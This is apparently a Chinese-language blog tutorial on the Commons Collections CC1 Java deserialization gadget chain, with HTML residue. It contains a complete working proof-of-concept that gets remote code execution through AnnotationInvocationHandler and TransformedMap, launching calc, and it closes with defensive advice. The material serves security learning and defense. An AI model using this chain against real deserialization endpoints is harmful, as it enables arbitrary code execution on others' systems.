Java反序列化漏洞分析：CC1攻击链详解<\/h1>

1. 引言<\/h2>
Java反序列化漏洞是近年来网络安全领域的重要威胁之一，其中Apache Commons Collections (CC)库的反序列化漏洞尤为著名。CC1攻击链通过巧妙利用Java反序列化机制，构造恶意对象链，最终实现远程代码执行(RCE)。本文将深入剖析CC1攻击链的工作原理、技术细节和防御措施。<\/p>

2. 环境准备<\/h2>

2.1 开发环境配置<\/h3>

JDK版本<\/strong>：8u65（关键版本，后续版本已修复部分漏洞）<\/li>
IDE<\/strong>：IntelliJ IDEA<\/li>

依赖库<\/strong>：commons-collections 3.2.1<\/li> <\/ul>
2.2 Maven项目配置<\/h3>
<dependencies><\/span> <\/span><\/span> <dependency><\/span> <\/span><\/span> <groupId><\/span>commons-collections<\/groupId><\/span> <\/span><\/span> <artifactId><\/span>commons-collections<\/artifactId><\/span> <\/span><\/span> <version><\/span>3.2.1<\/version><\/span> <\/span><\/span> <\/dependency><\/span> <\/span><\/span><\/dependencies><\/span> <\/span><\/span><\/code><\/pre>3. CC1攻击链核心组件<\/h2> 3.1 InvokerTransformer<\/h3> InvokerTransformer<\/code>是攻击链中的关键类，通过反射机制执行任意方法：<\/p> \/\/ 常规反射执行命令 <\/span><\/span><\/span><\/span>Runtime r =<\/span> Runtime.<\/span>getRuntime<\/span>();<\/span> <\/span><\/span>Class<<\/span>Runtime><\/span> c =<\/span> Runtime.<\/span>class<\/span>;<\/span> <\/span><\/span>Method method =<\/span> c.<\/span>getMethod<\/span>(<\/span>"exec"<\/span>,<\/span> String.<\/span>class<\/span>);<\/span> <\/span><\/span>method.<\/span>invoke<\/span>(<\/span>r,<\/span>"calc"<\/span>);<\/span> <\/span><\/span> <\/span><\/span>\/\/ 使用InvokerTransformer实现相同功能 <\/span><\/span><\/span><\/span>new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"calc"<\/span>}).<\/span>transform<\/span>(<\/span>r);<\/span> <\/span><\/span><\/code><\/pre>3.2 TransformedMap<\/h3> TransformedMap<\/code>提供了对Map对象的装饰功能，可以在Map条目被修改时触发回调：<\/p> HashMap<<\/span>Object,<\/span>Object><\/span> map =<\/span> new<\/span> HashMap<>();<\/span> <\/span><\/span>map.<\/span>put<\/span>(<\/span>"123"<\/span>,<\/span>"12"<\/span>);<\/span> <\/span><\/span>Map<<\/span>Object,<\/span>Object><\/span> transformedMap =<\/span> TransformedMap.<\/span>decorate<\/span>(<\/span>map,<\/span> null<\/span>,<\/span> invokerTransformer);<\/span> <\/span><\/span><\/code><\/pre>3.3 ChainedTransformer<\/h3> ChainedTransformer<\/code>允许将多个Transformer串联起来按顺序执行：<\/p> Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span>Class[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> null<\/span>}),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span>Object[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>null<\/span>,<\/span> null<\/span>}),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"calc"<\/span>})<\/span> <\/span><\/span>};<\/span> <\/span><\/span>ChainedTransformer chainedTransformer =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span> <\/span><\/span>chainedTransformer.<\/span>transform<\/span>(<\/span>Runtime.<\/span>class<\/span>);<\/span> <\/span><\/span><\/code><\/pre>4. 完整攻击链分析<\/h2> 4.1 攻击链调用流程<\/h3> ObjectInputStream.readObject ↓ AnnotationInvocationHandler.readObject ↓ AbstractInputCheckedMapDecorator.setValue ↓ TransformedMap.checkSetValue ↓ ChainedTransformer.transform ↓ InvokerTransformer.transform <\/code><\/pre> 4.2 关键问题解决<\/h3> Runtime不可序列化问题<\/strong>：<\/p> 通过反射方式获取Runtime实例：<\/li> <\/ul> Method getRuntimeMethod =<\/span> (<\/span>Method)<\/span> new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span>Class[].<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> null<\/span>}).<\/span>transform<\/span>(<\/span>Runtime.<\/span>class<\/span>);<\/span> <\/span><\/span>Runtime r =<\/span> (<\/span>Runtime)<\/span> new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span>Object[].<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>null<\/span>,<\/span> null<\/span>}).<\/span>transform<\/span>(<\/span>getRuntimeMethod);<\/span> <\/span><\/span><\/code><\/pre><\/li> memberType为空问题<\/strong>：<\/p> 使用Target.class<\/code>替代Override.class<\/code><\/li> 修改Map的key为"value"：map.put("value","12")<\/code><\/li> <\/ul> <\/li> <\/ol> 4.3 完整利用代码<\/h3> import<\/span> org.apache.commons.collections.Transformer;<\/span> <\/span><\/span>import<\/span> org.apache.commons.collections.functors.ChainedTransformer;<\/span> <\/span><\/span>import<\/span> org.apache.commons.collections.functors.ConstantTransformer;<\/span> <\/span><\/span>import<\/span> org.apache.commons.collections.functors.InvokerTransformer;<\/span> <\/span><\/span>import<\/span> org.apache.commons.collections.map.TransformedMap;<\/span> <\/span><\/span> <\/span><\/span>import<\/span> java.io.*;<\/span> <\/span><\/span>import<\/span> java.lang.annotation.Target;<\/span> <\/span><\/span>import<\/span> java.lang.reflect.Constructor;<\/span> <\/span><\/span>import<\/span> java.lang.reflect.InvocationTargetException;<\/span> <\/span><\/span>import<\/span> java.nio.file.Files;<\/span> <\/span><\/span>import<\/span> java.nio.file.Paths;<\/span> <\/span><\/span>import<\/span> java.util.HashMap;<\/span> <\/span><\/span>import<\/span> java.util.Map;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> CC1Exploit<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> \/\/ 构造Transformer链 <\/span><\/span><\/span><\/span> Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span> <\/span><\/span> new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span>Class[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> null<\/span>}),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span>Object[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>null<\/span>,<\/span> null<\/span>}),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"calc"<\/span>})<\/span> <\/span><\/span> };<\/span> <\/span><\/span> <\/span><\/span> ChainedTransformer chainedTransformer =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 构造恶意Map <\/span><\/span><\/span><\/span> HashMap map =<\/span> new<\/span> HashMap<>();<\/span> <\/span><\/span> map.<\/span>put<\/span>(<\/span>"value"<\/span>,<\/span> "12"<\/span>);<\/span> <\/span><\/span> Map transformedMap =<\/span> TransformedMap.<\/span>decorate<\/span>(<\/span>map,<\/span> null<\/span>,<\/span> chainedTransformer);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 通过反射获取AnnotationInvocationHandler实例 <\/span><\/span><\/span><\/span> Class c =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>);<\/span> <\/span><\/span> Constructor constructor =<\/span> c.<\/span>getDeclaredConstructor<\/span>(<\/span>Class.<\/span>class<\/span>,<\/span> Map.<\/span>class<\/span>);<\/span> <\/span><\/span> constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> Object instance =<\/span> constructor.<\/span>newInstance<\/span>(<\/span>Target.<\/span>class<\/span>,<\/span> transformedMap);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 序列化和反序列化触发漏洞 <\/span><\/span><\/span><\/span> serialize(<\/span>instance);<\/span> <\/span><\/span> unserialize(<\/span>"cc1.bin"<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> serialize<\/span>(<\/span>Object obj)<\/span> throws<\/span> IOException {<\/span> <\/span><\/span> ObjectOutputStream oos =<\/span> new<\/span> ObjectOutputStream(<\/span>Files.<\/span>newOutputStream<\/span>(<\/span>Paths.<\/span>get<\/span>(<\/span>"cc1.bin"<\/span>)));<\/span> <\/span><\/span> oos.<\/span>writeObject<\/span>(<\/span>obj);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> public<\/span> static<\/span> Object unserialize<\/span>(<\/span>String filename)<\/span> throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span> <\/span><\/span> ObjectInputStream ois =<\/span> new<\/span> ObjectInputStream(<\/span>Files.<\/span>newInputStream<\/span>(<\/span>Paths.<\/span>get<\/span>(<\/span>filename)));<\/span> <\/span><\/span> return<\/span> ois.<\/span>readObject<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>5. 漏洞防御措施<\/h2> 升级Commons Collections库<\/strong>：<\/p> 使用3.2.2及以上版本，其中修复了相关漏洞<\/li> <\/ul> <\/li> Java反序列化防护<\/strong>：<\/p> 使用ObjectInputFilter<\/code>限制反序列化的类<\/li> 实现自定义的ObjectInputStream<\/code>并重写resolveClass<\/code>方法<\/li> <\/ul> <\/li> 其他措施<\/strong>：<\/p> 使用白名单机制控制可反序列化的类<\/li> 对关键系统进行网络隔离<\/li> 定期进行安全审计和漏洞扫描<\/li> <\/ul> <\/li> <\/ol> 6. 总结<\/h2> CC1攻击链展示了Java反序列化漏洞的严重性，攻击者通过精心构造的恶意对象链，可以在目标系统上执行任意代码。理解这一攻击链不仅有助于防御此类漏洞，也能提高开发人员对Java安全机制的认识。安全开发应从每一行代码做起，对反序列化操作保持高度警惕。<\/p>